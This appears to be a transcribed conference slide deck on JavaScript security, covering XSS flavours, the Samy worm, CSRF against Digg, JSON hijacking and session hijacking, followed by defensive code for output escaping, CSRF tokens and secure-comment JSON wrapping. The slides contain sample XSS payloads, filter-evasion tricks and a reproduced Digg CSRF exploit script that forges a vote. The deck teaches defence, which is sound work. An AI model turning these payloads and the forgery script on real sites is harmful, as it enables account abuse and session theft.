JavaScript Security

JavaScript, as it is today, is an insecure language. We need to understand its shortcomings to improve the security of our applications and protect our users.

Published in: Technology

JavaScript Security

  1. JavaScript Security, Jason Harwig
  2. "How dangerous could this silly little toy scripting language running inside a browser be?" Jeff Atwood, codinghorror.com, stackoverflow.com
  3. “JavaScript's biggest weakness is that it is not secure.” Douglas Crockford
  4. "... nine out of 10 websites still have serious vulnerabilities ... (XSS) as the top vulnerability class" WhiteHat Security Website Security Statistic Report
  5. OWASP Top 10 2007: 1. XSS; 2. Injection Flaws; 3. File Exec; 4. Direct Object Reference; 5. CSRF; 6. Information Leakage; 7. Broken Auth; 8. Insecure Crypto; 9. Insecure Communications; 10. Failure to restrict URL access
  6. browser limitations
  7. javascript IO • Ajax • Image • iFrame • Source script • Bridge to Flash, Java applets
  8. var xhr = new XMLHttpRequest(); xhr.open(...)
  9. [diagram: NIC, Server, Google] * get or post
  10. var image = new Image(); image.src = url; * can detect connection success / failure
  11. [diagram: NIC, Server, Google] * get requests only | onload | onerror
  12. f = document.createElement('iframe'); f.src = url; document.body.appendChild(f); * only if same domain
  13. [diagram: NIC, Server, Google] * get requests only
  14. s = document.createElement('script'); s.type = 'text/javascript'; s.src = url; document.body.appendChild(s); * if JSON returned
  15. [diagram: NIC, Server, Google] * get requests only
  16. f = document.createElement('form'); f.method = 'post'; ... f.submit();
  17. [diagram: NIC, Server, Google] * get or post
  18. white hat • Mashup / Aggregate content • SSO Solutions • Protect users / application integrity
  19. black hat • XSS • CSRF • JSON hijacking • Cookie session hijacking • Internal network scanning • History checking
  20. cross-site scripting
  21. Browser / IFrame same origin policy
  22. user input: escape it!
  23. XSS Flavors • Type 0 - DOM • Type 1 - Non-Persistent • Type 2 - Persistent
  24. type 0: var p = decodeURIComponent(location.hash.slice(1)); document.body.innerHTML = p; // URL data written straight into the DOM as markup
  25. Type 1: Search: <script>alert('xss');</script>
  26. Type 2: Please enter username: <script>alert('xss');</script>
  27. <c:out value="${var}" escapeXml="true"/> Your Username: <script>alert('xss');</script> (shown escaped, as text)
  28. html filtering
  29. samy is my hero, from http://fast.info/myspace/
  30. [chart: Friend Requests, 0 to 7,000, over time: 12:34pm, 1:30am, 8:35am, 9:30am, 10:30am, 1:30pm]
  31. tag/attribute whitelist <div style="background:url( 'javascript:alert('xss')' )">
  32. 'javascript' stripped <div style="background:url( 'javanscript:alert('xss')' )">
  33. " stripped String.fromCharCode(34);
  34. innerHTML stripped eval('document.body.inne' + 'rHTML');
  35. onreadystatechange stripped eval('xmlhttp.onread' + 'ystatechange = callback');
  36. to be continued..
  37. alternatives to escaping?
  38. google caja / ADsafe
  39. attack vectors to prevent?
  40. code evaluation eval('alert(document.cookie)'); (new Function('alert(document.cookie)'))();
  41. code eval continued <iframe src="java�script:alert('xss')"> </iframe>
  42. polluting global objects try { throw EvilArrayFunction; } catch (Array) { }
  43. xss lessons • Escape XML
  44. cross site request forgery, the new kid
  45. [diagram: NIC, Server, Google]
  46. Digg.com • “digg” a story while logged in • Cookie authentication • known url, parameters
  47. digg exploit code mf = window.frames["myframe"]; html = '<form name="diggform" action="http://digg.com/diginfull" method="post">'; html = html+'<input type="text" name="id" value="367034"/>'; html = html+'<input type="text" name="orderchange" value="2"/>'; html = html+'<input type="text" name="category" value="0"/>'; html = html+'<input type="text" name="page" value="0"/>'; html = html+'<input type="text" name="t" value="undefined"/>'; html = html+'<input type="text" name="row" value="1"/>'; html = html+'</form>'; mf.document.body.innerHTML = html; mf.document.diggform.submit(); from http://4diggers.blogspot.com/
  48. Fixes? • Referral checking? • quick cookie expiration? • post?
  49. solved session.setAttribute("token", token); <input type="hidden" value="${token}"/>
  50. double submit cookie
  51. digg link <a href="javascript:dig([num],[id],[digCheck])">digg it</a>
  52. digg submit js new Ajax.Request("/diginfull", { "method": "post", "parameters": "id=" + itemd + "&row=" + row + "&digcheck=" + digcheck + "&type=" + type + "&loc=" + pagetype });
  53. no diggcheck, no digg
  54. digg.com • Added random hash as post parameter • server verifies request
  55. myspace • used hash in post to add friends • XSS vulnerable so the hash could be retrieved
  56. HDIV • HTTP Data Integrity Validator
  57. rsnake joins twitter
  58. crossdomain.xml <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd"> <allow-access-from domain="*.twitter.com" /> <site-control permitted-cross-domain-policies="master-only"/> <allow-http-request-headers-from domain="*.twitter.com" headers="*" secure="true"/> </cross-domain-policy>
  59. http://www.yourminis.com/search_minis.aspx?q=XSS
  60. stealing your gmail contacts
  61. google contacts url contacts?out=js&callback=google
  62. responseText google({ Success: true, Errors: [], Body: { Contacts: [ { id, email, etc. } ] } });
  63. google’s solution? • responseXml
  64. lessons • Protect high value forms • CANNOT be stopped if site is vulnerable to XSS
  65. json hijacking
  66. new Ajax.Request('secretStuff', { onSuccess: doWork }); // server responds with [ { sensitive_info: '...' }, { sensitive_info: '...' } ]
  67. So how do I do it? • Override Array • Source script
  68. demo
  69. solved /*-secure- [ { sensitive_info: '...' }, { sensitive_info: '...' } ] */
  70. “solved” continued • protect JSON services behind post
  71. lessons • Many experts recommend JSON services shouldn’t serve sensitive data • use secure comment • responseXml as alternative
  72. Session hijacking
  73. demo
  74. internal network penetration
  75. history hijack
  76. demo
  77. resources • "Security Now! Podcast" twit.tv/sn • "Fortify" fortifysoftware.com/security-resources/ • "WhiteHat Security" whitehatsec.com • "XSS Generator" ha.ckers.org/xss.html • "Jeremiah Grossman Blog" jeremiahgrossman.blogspot.com • "Samy is my Hero" fast.info/myspace • "Digg Hack" 4diggers.blogspot.com • "HDIV" hdiv.org
  78. twitter: jharwig jason.harwig@nearinfinity.com nearinfinity.com/blogs careers@nearinfinity.com
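Output escaping, the fix the "user input: escape it!" and "xss lessons: Escape XML" slides call for, as an added example that is not from the presentation: escapeHtml is the JavaScript counterpart of the JSTL escapeXml="true" on the c:out slide, applied to the three XSS flavours (DOM, non-persistent, persistent) shown on the slides; renderSearch, renderUsername and renderFromHash are hypothetical helper names.

```javascript
// Added example, not from the slides. The five characters that let text break out of an
// HTML text or attribute context, mapped to their entities.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Equivalent of <c:out escapeXml="true"/>: every untrusted value is escaped on output,
// whatever a blacklist filter did or did not strip on the way in.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Type 1 (non-persistent) case from the "Search:" slide: the query is echoed back in the page.
function renderSearch(query) {
  return '<p>Search: ' + escapeHtml(query) + '</p>';
}

// Type 2 (persistent) case: a stored username is printed on every later page view.
function renderUsername(storedName) {
  return 'Your Username: ' + escapeHtml(storedName);
}

// Type 0 (DOM) case: URL data is written into the document as text via textContent,
// never as markup via innerHTML. `el` is any node with a textContent property
// (document.body in a browser); the fragment is the part of the URL after '#'.
function renderFromHash(el, hash) {
  el.textContent = decodeURIComponent(hash.replace(/^#/, ''));
  return el.textContent;
}

// Constructed payload, the same one the slides use.
const XSS_PAYLOAD = "<script>alert('xss');</script>";
```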
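The two CSRF fixes the "solved" and "double submit cookie" slides name, a session-stored token and a cookie that must be echoed in the form, as an added example that is neither the Digg nor the HDIV code from the slides; the session, cookie and request objects are plain objects standing in for a framework's, and all function names are hypothetical.

```javascript
// Added example, not from the slides. Node's crypto module supplies randomness and a
// constant-time comparison.
const crypto = require('crypto');

// Server side, once per session: mint the unguessable value (the "random hash" Digg added).
function issueToken(session) {
  session.token = crypto.randomBytes(32).toString('hex');
  return session.token;
}

// Constant-time comparison; a missing or wrongly sized value is simply invalid.
function tokensMatch(expected, presented) {
  if (typeof expected !== 'string' || typeof presented !== 'string') return false;
  const a = Buffer.from(expected);
  const b = Buffer.from(presented);
  return a.length === b.length && crypto.timingSafeEqual(a, b);
}

// Synchronizer token: the hidden field (<input type="hidden" value="${token}"/>) must equal
// the value kept in the session, and only a POST is accepted ("protect high value forms").
function verifySynchronizerToken(req, session) {
  return req.method === 'POST' && tokensMatch(session.token, req.body.token);
}

// Double-submit cookie: the field must equal the cookie the browser sent. A cross-site form
// post carries the cookie automatically but cannot read it to fill in the field.
function verifyDoubleSubmit(req) {
  return req.method === 'POST' && tokensMatch(req.cookies.csrf, req.body.csrf);
}

// The Digg scenario from the slides: a post forged from another origin arrives with the
// session cookie but without the token, so it is rejected while the genuine "digg" passes.
function diggScenario() {
  const session = {};
  const token = issueToken(session);
  const genuine = { method: 'POST', body: { id: '367034', token } };
  const forged = { method: 'POST', body: { id: '367034' } };   // no token available cross-site
  return {
    genuine: verifySynchronizerToken(genuine, session),
    forged: verifySynchronizerToken(forged, session),
  };
}
```

As the "lessons" slide notes, neither check survives an XSS hole on the same site, since injected script can read the token or the cookie-backed field.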
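The secure-comment wrapping from the JSON hijacking "solved" slide, as an added example that is not from the presentation: the server-side wrapper, the client-side unwrapper, and a vm-based stand-in for what a cross-site script include of the response body would evaluate; function names are hypothetical.

```javascript
// Added example, not from the slides. vm runs a string as a program in a fresh context and
// returns its completion value, which is the closest offline stand-in for <script src=...>.
const vm = require('vm');

const SECURE_PREFIX = '/*-secure-';
const SECURE_SUFFIX = '*/';

// Server: emit the JSON inside a block comment. Loaded cross-site through a script tag the
// whole body is one comment, so no array literal is ever constructed for an Array override
// to capture.
function wrapSecureJson(data) {
  return SECURE_PREFIX + '\n' + JSON.stringify(data) + '\n' + SECURE_SUFFIX;
}

// Client: the same-origin XHR can read responseText, so it strips the wrapper and parses.
// An unwrapped body is rejected, so a service that forgets the wrapper fails loudly.
function unwrapSecureJson(responseText) {
  const text = responseText.trim();
  if (!text.startsWith(SECURE_PREFIX) || !text.endsWith(SECURE_SUFFIX)) {
    throw new Error('response is not wrapped in the secure comment');
  }
  return JSON.parse(text.slice(SECURE_PREFIX.length, -SECURE_SUFFIX.length));
}

// Stand-in for a cross-site script include: run the body as a program and return the value
// of its last statement. A bare array literal yields the array; the wrapped body yields nothing.
function evaluateAsScript(body) {
  return vm.runInNewContext(body);
}

// Constructed sample of the "secretStuff" response from the slide.
const SECRET = [{ sensitive_info: 'acct-1 balance' }, { sensitive_info: 'acct-2 balance' }];
```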